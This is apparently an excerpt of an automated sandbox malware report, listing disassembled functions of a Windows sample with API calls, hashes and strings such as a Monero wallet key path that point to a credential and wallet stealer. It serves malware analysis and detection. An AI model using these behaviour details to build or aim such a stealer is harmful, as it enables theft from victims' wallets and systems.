                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 91b3f78db31c7c801d27c537d76381df9915c1abbf85564eb8ec098e07bd5ba5
                              • Instruction ID: 47ac2e5d432c3c4e50063061971128e2008de5bca96a5859db6c994794cd794a
                              • Opcode Fuzzy Hash: 91b3f78db31c7c801d27c537d76381df9915c1abbf85564eb8ec098e07bd5ba5
                              • Instruction Fuzzy Hash: 5C616070940248EFDB24EFA4CC96FEE7779AF54301F408118F91A9F191EB706A0ACB52
                              Function 001540B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,00DDDA48,00000000,00020119,?), ref: 001540F4
                              • RegQueryValueExA.ADVAPI32(?,00DDE4D0,00000000,00000000,00000000,000000FF), ref: 00154118
                              • RegCloseKey.ADVAPI32(?), ref: 00154122
                              • lstrcat.KERNEL32(?,00000000), ref: 00154147
                              • lstrcat.KERNEL32(?,00DDE518), ref: 0015415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: 9475541d8dcd458a51ba6fa3570d505642c28e35bfb0847f82ec41c7efbff5a8
                              • Instruction ID: 8e5baf93db39688519e37de010a3aa2b955ff6b8fd6dc07ecb3aa129054da470
                              • Opcode Fuzzy Hash: 9475541d8dcd458a51ba6fa3570d505642c28e35bfb0847f82ec41c7efbff5a8
                              • Instruction Fuzzy Hash: 1741BCB6D10208ABDB15EBA0DC46FFD737DAB98300F004599B7255B181EB755B8C8BD2
                              Function 00157E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00157E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00157E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,00DCB578,00000000,00020119,?), ref: 00157E5E
                              • RegQueryValueExA.ADVAPI32(?,00DDD7E8,00000000,00000000,000000FF,000000FF), ref: 00157E7F
                              • RegCloseKey.ADVAPI32(?), ref: 00157E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 55cec0a51e15ff3d787e8729fa256acc7a237898886b07c092bc1f9a8831c871
                              • Instruction ID: db8a34a263d4bbdc5c3d755ac8902ea0a5f81a14d7bf2766d2a4d1f98099ceb4
                              • Opcode Fuzzy Hash: 55cec0a51e15ff3d787e8729fa256acc7a237898886b07c092bc1f9a8831c871
                              • Instruction Fuzzy Hash: 481151B1A44705EBE715CFD4ED4AF7BBBBCEB04711F10415AFA15A7280D77458048BA1
                              Function 00159260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrStrA.SHLWAPI(00DDE260,?,?,?,0015140C,?,00DDE260,00000000), ref: 0015926C
                              • lstrcpyn.KERNEL32(0038AB88,00DDE260,00DDE260,?,0015140C,?,00DDE260), ref: 00159290
                              • lstrlen.KERNEL32(?,?,0015140C,?,00DDE260), ref: 001592A7
                              • wsprintfA.USER32 ref: 001592C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: 990f39d35bad51b4652817633538fd7640f1bfe55a17cb48da588f89b9b91128
                              • Instruction ID: 64013c1a56cdc0308f6d992f1c2166572e0aaa993426bf45b09940e943329d8d
                              • Opcode Fuzzy Hash: 990f39d35bad51b4652817633538fd7640f1bfe55a17cb48da588f89b9b91128
                              • Instruction Fuzzy Hash: 6C010C75500608FFDB05DFECC984EAE7BB9EB48351F108189F9098B204C731EA40DB92
                              Function 001412A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001412B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001412BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001412D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001412F5
                              • RegCloseKey.ADVAPI32(?), ref: 001412FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 7d482d2c351d264e63c1eae45d72286eca06c69c702972a2b96c375e7f19f470
                              • Instruction ID: 6705d430ffc3fdce1a81f73a5cd658284d50927c773069378de804183d88bc3f
                              • Opcode Fuzzy Hash: 7d482d2c351d264e63c1eae45d72286eca06c69c702972a2b96c375e7f19f470
                              • Instruction Fuzzy Hash: 650136B5A40308BBEB00DFE0DC49FAEB7BCEB48701F108195FA05D7280D6749A019F51
                              Function 0015C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: 8ff013f619eb2a416373ba0118e91791c687da90bfbb81801c287de570fe0cb9
                              • Instruction ID: 56f4de7627b80e87fd40dc5fe6525019e41dd975048b45f96c5464532191e118
                              • Opcode Fuzzy Hash: 8ff013f619eb2a416373ba0118e91791c687da90bfbb81801c287de570fe0cb9
                              • Instruction Fuzzy Hash: AC41E77150079C9EDB258F24CC94BFB7BF89F45709F1444A8ED9A8A182D3719A48CF60
                              Function 00156630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00156663
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00156726
                              • ExitProcess.KERNEL32 ref: 00156755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: 1abc9ab6b455f066bf18e4e64971fe340b663366b15cb93744809009f7e87b5e
                              • Instruction ID: 47dee0c743806dc3221332b805bbcd308581de4bfe0b9f7dee34580e85eb33ac
                              • Opcode Fuzzy Hash: 1abc9ab6b455f066bf18e4e64971fe340b663366b15cb93744809009f7e87b5e
                              • Instruction Fuzzy Hash: EC316BB1801218EBDB15EB90DC92BDEB77CAF54301F804189F6296A191DF746B48CF6A
                              Function 001587C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00160E28,00000000,?), ref: 0015882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00158836
                              • wsprintfA.USER32 ref: 00158850
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: d2d90db97d47f3429dad176925c7dd65e3a39e4d5be5b4bf8bccb7e35f3a3d9a
                              • Instruction ID: 640e2973e0f7f325fa2a51a1c8bfd18c93d151a3af4f54456fb66fded8a1c899
                              • Opcode Fuzzy Hash: d2d90db97d47f3429dad176925c7dd65e3a39e4d5be5b4bf8bccb7e35f3a3d9a
                              • Instruction Fuzzy Hash: 932100B1A40704EFEB05DFD4DD45FAEBBB8FB48711F104159FA15A7280C77999018BA1
                              Function 00158D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0015951E,00000000), ref: 00158D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00158D62
                              • wsprintfW.USER32 ref: 00158D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: da76a52097c8eec6ceaaa5270deb6492c7e7645c16dedaaa173e4f023973a40f
                              • Instruction ID: bd5ca79289ff5b93b9c938c5942b2f87f58bb9a4270fd17b41bba6a78da7b62c
                              • Opcode Fuzzy Hash: da76a52097c8eec6ceaaa5270deb6492c7e7645c16dedaaa173e4f023973a40f
                              • Instruction Fuzzy Hash: 07E0ECB5A40308BBE711DBD4DD0AE697BBCEB48702F004195FE0997280DA719E109BA6
                              Function 0014A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                                • Part of subcall function 00158B60: GetSystemTime.KERNEL32(00160E1A,00DDA988,001605AE,?,?,001413F9,?,0000001A,00160E1A,00000000,?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 00158B86
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0014A2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 0014A3FF
                              • lstrlen.KERNEL32(00000000), ref: 0014A6BC
                                • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 0014A743
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 910a5096515c9f3e6a210e67e10e7c25747e7ec3987531d7b3ced6a674628458
                              • Instruction ID: 8b1761fe7bdfd0cc39a9808a5d0e9c62e93719348e138c582ca1c97101b53c64
                              • Opcode Fuzzy Hash: 910a5096515c9f3e6a210e67e10e7c25747e7ec3987531d7b3ced6a674628458
                              • Instruction Fuzzy Hash: B3E1C472850118DADB05EBA4DC95DEE733CBF24302F908259F9267A091EF746A4DCB62
                              Function 0014D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                                • Part of subcall function 00158B60: GetSystemTime.KERNEL32(00160E1A,00DDA988,001605AE,?,?,001413F9,?,0000001A,00160E1A,00000000,?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 00158B86
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
